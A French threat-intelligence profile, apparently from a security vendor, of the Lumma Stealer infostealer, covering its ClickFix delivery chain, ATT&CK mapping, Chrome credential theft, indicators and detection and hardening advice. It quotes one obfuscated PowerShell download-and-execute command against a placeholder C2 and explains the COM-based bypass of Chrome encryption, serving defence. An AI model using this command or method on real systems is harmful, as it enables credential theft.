Lumma Stealer

Infostealer (MaaS) · Observé pour la première fois en août 2022

Présentation

Lumma Stealer est un infostealer ciblant Windows, exploité comme logiciel malveillant en tant que service depuis août 2022. Microsoft suit cette famille d'opérateurs sous le nom Storm-2477. Les affiliés louent le logiciel malveillant sur des forums cybercriminels russophones au moyen d'abonnements à plusieurs niveaux ; le code source complet serait proposé aux alentours de 20 000 $. Une fois exécuté, Lumma collecte les identifiants enregistrés dans les navigateurs, les cookies de session, les jetons d'authentification multifacteur, les données de portefeuilles de cryptomonnaies et les artefacts d'authentification locaux, puis les exfiltre vers une infrastructure contrôlée par l'attaquant.

Il s'agit de l'infostealer le plus largement déployé au cours des deux dernières années. Microsoft a identifié 394 000 hôtes Windows infectés sur une période de 90 jours s'achevant en mai 2025 ; le FBI estime à 10 millions le nombre cumulé d'infections dans le monde. Microsoft décrit Lumma comme la charge utile finale ClickFix la plus prolifique d'après ses propres données de chasse aux menaces.

L'infrastructure de Lumma a été perturbée en mai 2025 lors d'une opération coordonnée par la Digital Crimes Unit de Microsoft, le département de la Justice des États-Unis, Europol et le Cybercrime Control Center du Japon. L'opération a perturbé environ 2 300 domaines malveillants, dont plus de 1 300 ont été saisis ou transférés à Microsoft. Lumma a rétabli son infrastructure en quelques jours et reste actif. La dernière évolution documentée est une variante de distribution reposant sur Windows Terminal divulguée par Microsoft Threat Intelligence le 5 mars 2026.

Lumma n'est pas utilisé directement pour déployer un ransomware. Il s'agit d'un outil d'acquisition d'identifiants qui alimente l'écosystème plus large des ransomwares. Les identifiants volés sont vendus à des courtiers en accès initial, puis à des opérateurs de ransomware, notamment Octo Tempest, également suivi sous le nom Scattered Spider.

CHAÎNE D'ATTAQUE OPÉRATIONNELLE · DE CLICKFIX À LUMMA
  1. DÉPART

    Site Web malveillant

    Malvertising · leurre de logiciel piraté · hameçonnage

  2. ÉTAPE 1

    Faux CAPTCHA

    Le JavaScript détourne le presse-papiers

  3. ÉTAPE 2 — UTILISATEUR

    Win+R → coller → Entrée

    processus parent explorer / wt.exe

  4. ÉTAPE 3

    PowerShell récupère le chargeur

    powershell -w h … | iex

    CastleLoaderIDATEmmenhtal
  5. ÉTAPE 4

    Injection dans le navigateur

    QueueUserAPC() → chrome / edge

  6. ÉTAPE 5

    Contournement d'ABE · vol d'identifiants

    COM IElevator → Login Data · cookies · portefeuilles

  7. IMPACT

    Vendus à des courtiers en accès initial

    opérateurs de ransomware

ClickFix constitue le principal mode de distribution. Les autres vecteurs — téléchargement direct d'un programme d'installation, faux référentiels GitHub, pièces jointes d'hameçonnage — ignorent entièrement les étapes 1 et 2.

Tactiques, techniques et procédures

Lumma correspond à plusieurs tactiques MITRE ATT&CK Enterprise, avec la plus forte densité de techniques dans les phases Exécution et Contournement des défenses. La carte de couverture ci-dessous combine les correspondances officielles du logiciel Lumma avec les comportements de distribution ClickFix observés.

DÉTAIL DES TECHNIQUESTechniques principales · Lumma Stealer
TACTIQUETECHNIQUESACTION DE LUMMA
Accès initialDes liens d'hameçonnage et des sites compromis redirigent les victimes vers de faux CAPTCHA ou des pages proposant des logiciels piratés.
ExécutionL'utilisateur colle une commande du presse-papiers dans la boîte de dialogue Exécuter ou dans Windows Terminal. PowerShell, mshta ou MSBuild l'exécute — sans exploit ni CVE.
PersistanceClés Run du registre ou tâches planifiées, configurées par l'affilié. De nombreuses campagnes n'établissent pas de persistance : la première exécution suffit déjà à accomplir le vol.
Contournement des défensesLa charge utile du presse-papiers est complétée par des espaces. Les chargeurs détectent les machines virtuelles avant de déchiffrer, utilisent plusieurs couches d'obscurcissement et effectuent un chargement latéral via des binaires signés afin que le processus parent paraisse fiable. L'injection QueueUserAPC() dans chrome.exe est le mécanisme qui contourne le contrôle d'identité du processus d'ABE : l'injection n'est pas seulement une technique de contournement, elle constitue ici le prérequis de l'accès aux identifiants.
Accès aux identifiantsDéchiffre les identifiants au moyen de DPAPI (préfixe de blob v10, Chrome <127) ou d'un contournement d'ABE (préfixe de blob v20, Chrome 127+). La clé de chiffrement provient de Local State. Données ciblées : Login Data, Cookies et Web Data. Vole les cookies de session avec leurs indicateurs HttpOnly/Secure intacts, ce qui contourne la MFA sans casser le second facteur.
DécouverteCollecte l'identifiant matériel, la version du système d'exploitation et les logiciels installés. Ces informations servent à établir l'empreinte de la machine compromise et à en fixer le prix avant la vente de l'accès.
CollecteÉnumère plus de 80 applications et extensions de navigateur liées aux portefeuilles de cryptomonnaies, ainsi que les configurations VPN, clients de messagerie, clients FTP et données Telegram.
Commande et contrôlePOST HTTPS vers un C2 rotatif. Une variante DNS récupère des fragments de charge utile par l'intermédiaire d'enregistrements TXT. Après l'opération de démantèlement, le C2 est passé de Cloudflare à Selectel, un hébergeur russe.
ExfiltrationToutes les données volées sont envoyées sur le canal C2. Le trafic est généralement inférieur à 500 Ko par hôte, en dessous de la plupart des seuils DLP.
Reconnaissance / Dév. des ressources / Élév. de privilèges / Mouvement latéral / Impact—Non observé. Ces activités sont assurées par les opérateurs ou les affiliés de ransomware en aval.
ÉTAPE 1T1566.002 · T1204.002 · T1115

Le leurre ClickFix

Lumma est distribué au moyen de ClickFix, une technique d'ingénierie sociale devenue la méthode d'accès initial à Windows la plus courante. Le rapport Digital Defense Report 2025 de Microsoft attribue 47 % des attaques observées à ClickFix, devant l'hameçonnage traditionnel.

La page de leurre affiche un faux Cloudflare Turnstile, un faux Google reCAPTCHA, une invite de mise à jour du navigateur ou une erreur de visionneuse de documents. Lorsque la victime clique sur « vérifier », un JavaScript masqué écrit silencieusement une commande malveillante dans le presse-papiers. La page affiche ensuite trois instructions : Win+R, Ctrl+V, Entrée.

Une variante de février 2026 divulguée par Microsoft Threat Intelligence demande d'utiliser Win+X puis I à la place, ce qui lance Windows Terminal. Cette modification contourne les règles EDR configurées pour les processus parents issus de la boîte de dialogue Exécuter.

ClickFix n'est pas le seul vecteur de distribution. Parmi les autres méthodes actives de diffusion de Lumma figurent : le téléchargement direct d'un programme d'installation via le malvertising (l'utilisateur télécharge un MSI ou un ZIP signé, sans intervention du presse-papiers) ; de faux référentiels GitHub dotés de fichiers README générés par IA et faisant la promotion de triches de jeux ou d'outils piratés ; des pièces jointes à des e-mails d'hameçonnage (ZIP protégé par mot de passe contenant un LNK ou un MSI) ; et des leurres sur les réseaux sociaux, via YouTube et Facebook, renvoyant vers des charges utiles hébergées sur Google Sites. Ces vecteurs contournent entièrement les étapes du presse-papiers et rejoignent la chaîne d'attaque à l'étape 3 (exécution du chargeur). La couverture de détection de ces voies repose sur les étapes 3 à 5 plutôt que sur la corrélation entre presse-papiers et processus.

ÉTAPE 2T1059.001 · T1027 · T1140 · T1218

La charge utile du presse-papiers

La chaîne placée dans le presse-papiers est presque toujours obscurcie. Modèle représentatif observé dans des campagnes actives :

Modèle documenté dans les rapports de Microsoft Threat Intelligence
powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm hxxp://[C2_IP]:8080/$u|iex"

Modèle documenté dans les rapports de Microsoft Threat Intelligence

Trois techniques sont combinées dans cette seule ligne. L'option -w h masque la fenêtre PowerShell. L'appel irm (Invoke-RestMethod) récupère une charge utile distante. Le chemin de l'URL est un créneau temporel : la commande construit une URL telle que hxxp://[C2]:8080/1746403200, où le nombre correspond à l'horodatage Unix actuel arrondi à une fenêtre de 16 secondes (l'opération -band 0xfffffffffffffff0 supprime les 4 derniers bits). Le serveur C2 ne fournit la charge utile que pendant cette fenêtre précise. Si un analyste en sécurité capture la commande et la rejoue dix minutes plus tard, le chemin de l'URL a changé et le serveur ne renvoie rien : la charge utile est éphémère et ne peut plus être récupérée ultérieurement pour analyse.

Autres variantes de distribution observées dans les campagnes actuelles :

  • mshta.exe récupérant un HTA contenant du VBScript (T1218.005)
  • nslookup -type=txt récupérant des fragments de charge utile encodés en base64 dans des enregistrements DNS TXT (T1071.004)
  • MSBuild.exe appelé depuis une chaîne batch-vers-VBScript communiquant avec des terminaux RPC de blockchain pour un C2 reposant sur EtherHiding
ÉTAPE 3T1055 · T1574.002 · T1497 · T1620

Le chargeur

La commande du presse-papiers ne distribue pas directement Lumma. Elle distribue un chargeur. Trois chargeurs dominent les campagnes Lumma actuelles : CastleLoader (exécution en mémoire, plusieurs couches d'obscurcissement), IDAT Loader (chargement latéral de DLL via des applications légitimes signées) et Emmenhtal / PEAKLIGHT (utilisé dans le cluster ClearFake et s'appuyant sur EtherHiding pour stocker des fragments de charge utile dans des contrats intelligents Binance Smart Chain).

Tous trois déchiffrent la charge utile Lumma en mémoire et n'écrivent jamais d'exécutable décompressé sur le disque. La charge utile est injectée dans des processus de navigateur en cours d'exécution au moyen de l'API QueueUserAPC(), en ciblant chrome.exe et msedge.exe.

ÉTAPE 4T1555.003 · T1539 · T1055.004 · T1115 · T1041

Vol d'identifiants et exfiltration

Lumma cible le stockage des identifiants Chromium selon deux modèles de protection, en fonction de la version de Chrome. La clé de chiffrement est stockée dans Local State (le fichier JSON contenant os_crypt.encrypted_key). Les données ciblées sont les fichiers SQLite Login Data, Cookies et Web Data.

DPAPI (préfixe de blob v10, Chrome <127). Historiquement, Chrome chiffrait la clé principale au moyen de Windows DPAPI (CryptProtectData). DPAPI lie le déchiffrement à la session ouverte de l'utilisateur, et non à un processus précis : tout processus s'exécutant dans le même contexte utilisateur peut appeler CryptUnprotectData pour récupérer la clé. C'est pourquoi les infostealers classiques pouvaient simplement copier les fichiers du navigateur dans un dossier temporaire et les déchiffrer de manière externe. Aucune injection n'est requise pour cette voie.

Contournement du chiffrement lié à l'application (préfixe de blob v20, Chrome 127+). Google a introduit ABE dans Chrome 127 précisément pour combler la lacune de DPAPI. ABE lie la clé principale à l'identité du processus du navigateur par l'intermédiaire du service COM IElevator de Chrome, qui valide l'appelant avant de libérer la clé. Tout processus autre que chrome.exe est refusé : c'est pourquoi l'injection est nécessaire pour les blobs v20. L'injection est le mécanisme qui contourne le contrôle d'identité du processus d'ABE.

Une fois injecté dans chrome.exe au moyen de QueueUserAPC(), le code de Lumma s'exécute dans le contexte du processus approuvé. Il appelle ensuite l'interface COM IElevator de Chrome ({708860E0-F641-4611-8895-7D867DD3675B}). Comme l'appel provient de l'intérieur de chrome.exe, le contrôle d'identité du processus d'ABE est validé. L'interface renvoie la clé AES en texte clair, que Lumma utilise pour déchiffrer les cookies et mots de passe v20 des fichiers SQLite.

Firefox est ciblé séparément par l'intermédiaire de logins.json et key4.db, qui utilisent le chiffrement NSS (Network Security Services), déchiffrable depuis le contexte de la session utilisateur.

Les cookies du navigateur sont exportés en conservant leurs indicateurs HttpOnly et Secure. C'est ainsi que Lumma contourne la MFA : il ne casse pas le second facteur, mais vole le jeton de session post-authentification et le rejoue. La campagne de février 2026 a également déposé Lumma dans C:\ProgramData\app_config\ctjb et établi une persistance au moyen d'une tâche planifiée.

Arborescence des processus

Aspect de la chaîne d'attaque dans la télémétrie EDR

Indicateurs de compromission

Les indicateurs ci-dessous sont durables : chemins de fichiers, clés de registre, modèles de processus et comportements réseau qui sont restés cohérents dans les campagnes Lumma et résistent aux changements de variante.

Chemins de fichiers

4 indicateurs

Emplacements dans lesquels Lumma dépose sa charge utile, ses éléments de persistance ou ses artefacts de préparation.

  • C:\ProgramData\app_config\ctjbLumma payload drop, Feb 2026 campaign
  • %AppData%\...\Startup\*.lnkRenamed 7-Zip extraction artifacts
  • %TEMP%\*.zipLNK shortcut persistence
  • %LocalAppData%\Temp\*.exeLoader staging, often deleted post-execution

Clés de registre

3 indicateurs

Emplacements du registre que Lumma lit ou écrit, ou dans lesquels il laisse des traces.

  • HKCU\...\Explorer\RunMRUDurable forensic evidence of Run-dialog command
  • HKCU\...\CurrentVersion\RunPersistence when configured by affiliate
  • HKLM\...\TaskCache\TasksScheduled task persistence (Feb 2026)

Modèles d'arborescence des processus

5 modèles

Chaînes d'exécution parent-enfant signalant qu'une chaîne d'attaque Lumma est en cours.

  • explorer.exe → powershell.exe [commande encodée]Classic Run-dialog ClickFix execution
  • explorer.exe → wt.exe → powershell.exeWindows Terminal variant, Feb 2026+
  • [binaire signé].exe → [altérée].dll → LummaDLL sideloading via IDAT/HijackLoader
  • chrome.exe ← QueueUserAPC() depuis un processus autre que le navigateurBrowser injection, Microsoft-documented
  • [hors navigateur] → lit Login Data / logins.jsonDirect credential database read

Comportement réseau

4 modèles

Modèles de trafic sortant observables au niveau du pare-feu, du proxy ou du DNS.

  • *.trycloudflare.com (sous-domaines aléatoires)Cloudflare tunneling for C2
  • Requêtes DNS TXT · serveurs non standardnslookup-based payload retrieval
  • POST HTTPS vers des domaines éphémères (< 72 h)Exfiltration to rotating C2
  • RPC BNB Smart Chain · processus autres que des portefeuillesEtherHiding payload retrieval

Réponse de Malware Protection Plus

Une démonstration présentant la détection de la chaîne d'exécution par LOLBins, l'endiguement automatisé du terminal affecté et la capture forensique des artefacts de commande.

Recommandations de détection

La chaîne d'attaque de Lumma laisse un modèle de corrélation distinctif dès ses premières étapes. L'analyse fondée sur les signatures ne détecte pas la charge utile, car chaque build du chargeur est modifié. La détection comportementale la repère, car la chaîne combine une activité du presse-papiers, l'exécution de binaires fiables et des anomalies de processus de navigateur selon une séquence qu'aucune activité utilisateur légitime ne produit.

  1. 01

    Corrélation entre presse-papiers et processus

    Télémétrie des terminaux

    Contenu du presse-papiers comprenant powershell, mshta, iex, nslookup ou des chaînes base64, suivi dans les trente secondes par l'exécution de ces mêmes binaires avec explorer.exe ou wt.exe comme processus parent.

    Pourquoi cela fonctionne : les utilisateurs légitimes collent rarement ces chaînes dans la boîte de dialogue Exécuter. La fenêtre de trente secondes corrèle le leurre avec l'exécution.

  2. 02

    Écritures dans le registre RunMRU

    Surveillance du registre

    Nouvelles entrées écrites dans HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU contenant PowerShell, mshta ou une syntaxe de commande encodée.

    Pourquoi cela fonctionne : cette clé persiste après la fin du processus ; l'artefact est donc durable pour reconstituer la chronologie forensique.

  3. 03

    Anomalies parent-enfant impliquant des LOLBins

    Télémétrie EDR / des processus

    Générez une alerte lorsque powershell.exe, mshta.exe, wscript.exe, rundll32.exe, nslookup.exe ou MSBuild.exe sont lancés comme enfants directs de explorer.exe ou wt.exe avec des lignes de commande encodées ou récupérant du contenu distant.

    Pourquoi cela fonctionne : dans un environnement utilisateur normal, ces binaires ne devraient jamais avoir ces processus parents avec ces arguments.

  4. 04

    Injection dans un processus de navigateur

    Télémétrie EDR / des API

    Appels QueueUserAPC() dans chrome.exe ou msedge.exe depuis des processus parents autres que les navigateurs. Lecture de logins.json, key4.db ou du fichier SQLite Chromium Login Data par tout processus autre que le navigateur.

    Pourquoi cela fonctionne : les navigateurs lisent eux-mêmes ces fichiers ; les processus externes ne devraient jamais le faire.

  5. 05

    Contournement d'ABE — instanciation COM IElevator

    Télémétrie EDR / COM

    Instanciation COM de {708860E0-F641-4611-8895-7D867DD3675B}, l'interface IElevator de Chrome, depuis un contexte de thread provenant de l'extérieur de chrome.exe, c'est-à-dire depuis un thread injecté. Générez une alerte lorsque tout processus autre qu'une installation Chrome légitime appelle ce CLSID.

    Pourquoi cela fonctionne : il s'agit de l'indicateur direct d'un contournement d'ABE en cours. Les appels IElevator légitimes proviennent du propre processus de Chrome ; un appel issu d'un thread injecté constitue une preuve sans ambiguïté d'un vol d'identifiants visant Chrome 127+.

  6. 06

    Anomalies réseau

    Journaux du pare-feu / DNS / proxy

    Connexions sortantes vers des sous-domaines *.trycloudflare.com composés de mots aléatoires. Requêtes répétées d'enregistrements DNS TXT auprès de serveurs faisant autorité non standard. Connexions à des terminaux RPC de blockchain depuis des processus autres que des portefeuilles.

    Pourquoi cela fonctionne : chaque modèle constitue un signal à usage unique — tunnels Cloudflare pour le C2, DNS pour la distribution par étapes et RPC pour EtherHiding.

Recommandations de durcissement

Les quatre modifications de configuration ci-dessous bloquent la majorité des variantes ClickFix actuelles sans coût de licence. Aucune ne nécessite l'achat d'un nouveau produit. Les éléments sont classés selon la difficulté de déploiement : Action rapide = GPO ou règle unique, déployable en quelques jours. Standard = nécessite un déploiement initial en mode audit, réalisable en quelques semaines.

  1. Désactiver la boîte de dialogue Exécuter de Windows pour les utilisateurs non administrateurs

    Action rapide

    Définissez la stratégie de groupe NoRun pour les comptes utilisateur qui n'ont pas besoin d'accéder à la boîte de dialogue Exécuter. Cette seule modification neutralise entièrement la variante ClickFix la plus courante.

    Chemin : Configuration utilisateur → Modèles d'administration → Menu Démarrer et barre des tâches → Supprimer le menu Exécuter du menu Démarrer.

  2. Activer la journalisation des blocs de script PowerShell et le mode de langage contraint

    Action rapide

    La journalisation des blocs de script capture les commandes obscurcies avant leur exécution, révélant les charges utiles même lorsqu'elles s'auto-suppriment. Le mode de langage contraint restreint les fonctions PowerShell dont les attaquants dépendent pour l'exécution en mémoire et la réflexion.

    Chemin : Configuration ordinateur → Modèles d'administration → Composants Windows → Windows PowerShell.

  3. Restreindre l'exécution des LOLBins au moyen d'AppLocker ou de WDAC

    Standard

    Bloquez ou restreignez mshta.exe, wscript.exe, cscript.exe, MSBuild.exe et SyncAppvPublishingServer.vbs dans les contextes non administratifs.

    Chemin : Configuration ordinateur → Paramètres Windows → Paramètres de sécurité → Stratégies de contrôle des applications. Commencez par un déploiement en mode audit.

  4. Bloquer ou signaler Windows Terminal en tant que processus parent de PowerShell

    Action rapide

    La variante ClickFix de février 2026 utilise spécifiquement Windows Terminal (wt.exe), car celui-ci contourne les règles de détection fondées sur la boîte de dialogue Exécuter.

    Chemin : mettez en œuvre ce contrôle au moyen d'une règle EDR personnalisée ou d'AppLocker.

  5. Vérifier que le chiffrement lié à l'application n'est pas désactivé par une stratégie

    Action rapide

    ABE est activé par défaut dans Chrome 127 et versions ultérieures. Les attaquants disposant de droits administrateur peuvent le désactiver au moyen d'une stratégie de groupe ou du registre, faisant revenir Chrome à une protection reposant uniquement sur DPAPI et rendant le vol d'identifiants trivial, sans injection.

    Vérification : confirmez que HKLM\SOFTWARE\Policies\Google\Chrome\ApplicationBoundEncryptionEnabled n'est pas défini sur 0. Si la clé existe avec cette valeur, ABE est désactivé et les identifiants Chrome ne sont protégés contre aucun processus s'exécutant dans la session utilisateur. Générez une alerte en cas d'écriture dans cette clé.

Références principales

Sources sur lesquelles cette page est fondée. Dernière vérification par rapport aux rapports de Microsoft Threat Intelligence publiés jusqu'en mars 2026.

Testez vos défenses contre les chaînes d'attaque allant de ClickFix à Lumma.

Malware Protection Plus détecte les modèles comportementaux que les outils fondés sur les signatures ne voient pas.